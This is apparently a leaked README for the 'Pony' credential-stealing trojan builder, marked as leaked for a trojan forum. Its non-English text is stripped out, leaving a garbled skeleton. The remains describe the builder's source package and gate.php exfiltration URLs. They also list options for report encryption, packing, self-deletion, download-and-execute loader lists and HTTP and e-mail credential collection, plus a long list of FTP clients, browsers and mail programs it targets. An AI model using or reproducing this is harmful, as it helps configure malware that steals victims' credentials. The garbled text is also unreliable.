###########################################
#Leaked for TrojanForge.com
###########################################


-=-   FTP  "Pony" -=-

 "PonyBuilder.exe"
========================

  -     "Pony.exe",      .

 :

*  "masm32" -  Microsoft Macro Assembler (MASM).
*  "PonySrc" -     MASM - () "Pony.exe".
*  "BuilderSrc" -     Delphi 7  - "PonyBuilder.exe".
*  "PonyBuilder.exe" - -   "Pony.exe".
*  "Help.txt" -  .
*  "build.bat" -         "PonySrc".
*  "Pony.ico" -    "Pony.exe"  ,      .

   4 :

1. 
    " URL   " -     URL    .
    -  URL,  : http://somedomain.com/dir/gate.php
       (URL),     URL    .
        ,  : http://privatedomain.com:8080/gate.php
   https://     .
  "Pony.exe"          ,     ,
           URL.

   " "      ,    *.ico.
   " "   "Pony.exe"   .

2. 
    ( ).       (URL)     .
  URL    ,       .
         :
  *   -   ,     .
  *      -           
  ()  ,  ,   ,    .

3. 
   ,    ,    "  "   .
  *  -      aPLib,   5    ,
       ,   ,   
   .
  *  -    RC4.
  *   - ,   ,       .
  *     ( ) -   "Pony.exe",      ,     
      ,    "out.bin",       ,     
       ().
  *    ( ) - ,      ,  "Pony.exe"  
    ,              "Pony.exe".
  *   -   ,       ,     .
  *     -    ,        .
  *  -   "Pony.exe"        .
  *   -      .
  *     UPX -    "Pony.exe"  .
  *     -        ,    2 
  *  :
    * Exe- -    Windows (*.exe)
    * Dll- -     .dll ,   ,         API- LoadLibrary(), .. URL    
            .dll .   DllTest    -,        Pony.dll,     DllTest.exe,
           LoadLibrary()  .dll .

    "  "       ,    .

4. 
         () .

    
=================================

     :
-PACK_REPORT -  
-ENCRYPT_REPORT -  ,     ,      "Mesoamerica"
-REPORT_PASSWORD= -  ,  : -REPORT_PASSWORD=Mesoamerica
-SAVE_REPORT -     ( )
-ENABLE_DEBUG_MODE -  
-SEND_MODIFIED_ONLY -    
-SELF_DELETE -  
-SEND_EMPTY_REPORTS -   
-ADD_ICON -     Pony.ico
-UPX -     UPX
-DOMAIN_LIST= -  ,        .  \n,  : -DOMAIN_LIST=http://host.com/gate.php\nhttp://host2.com/x/gate.php
-LOADER_LIST= -  URL   (     URL),  URL     DOMAIN_LIST
-LOADER_EXECUTE_NEW_FILES_ONLY -     
-DISABLE_MODULE= -       (       PonySrc\FTPClients.asm),  : -DISABLE_MODULE=MODULE_OPERA
-DLL_MODE -      Dll-
-COLLECT_HTTP -    HTTP/HTTPS 
-COLLECT_EMAIL -    E-mail  (POP3, IMAP, SMTP)
-UPLOAD_RETRIES=N -  (N)   ,    ,     2 

 "Pony.exe"
=================

 "Pony.exe" -            .

   NT  Windows,   Win98,  .     x86  x64.
         .

      .

       :
* FAR Manager
* Total Commander
* WS_FTP
* CuteFTP
* FlashFXP
* FileZilla
* FTP Commander
* BulletProof FTP
* SmartFTP
* TurboFTP
* FFFTP
* CoffeeCup FTP
* CoreFTP
* FTP Explorer
* Frigate3 FTP
* SecureFX
* UltraFXP
* FTPRush
* WebSitePublisher
* BitKinex
* ExpanDrive
* ClassicFTP
* Fling
* SoftX
* Directory Opus
* FreeFTP
* DirectFTP (  FreeFTP)
* LeapFTP
* WinSCP
* 32bit FTP
* NetDrive
* WebDrive
* FTP Control
* Opera
* WiseFTP
* FTP Voyager
* Firefox
* FireFTP
* SeaMonkey
* Flock
* Mozilla Suite Browser
* LeechFTP
* Odin Secure FTP Expert
* WinFTP
* FTP Surfer
* FTPGetter
* ALFTP
* Internet Explorer
* Dreamweaver
* DeluxeFTP
* Google Chrome
* Chromium
* SRWare Iron (  Chromium)
* ChromePlus
* Bromium (Yandex Chrome)
* Nichrome
* Comodo Dragon
* RockMelt
* K-Meleon
* Epic
* Staff-FTP
* AceFTP
* Global Downloader
* FreshFTP
* BlazeFTP
* NETFile
* GoFTP
* 3D-FTP
* Easy FTP
* Xftp
* FTP Now
* Robo-FTP
* LinasFTP
* Cyberduck
* Putty
* Notepad++ (NppFTP)
* CoffeeCup Visual Site Designer
* CoffeeCup Sitemapper (  CoffeeCup FTP)
* FTPShell
* FTPInfo
* NexusFile
* FastStone Browser
* CoolNovo
* WinZip
* Yandex.Internet
* MyFTP
* sherrod FTP
* NovaFTP
* Windows Mail
* Windows Live Mail
* Pocomail
* Becky!
* IncrediMail
* The Bat!
* Outlook
* Thunderbird
* FastTrackFTP
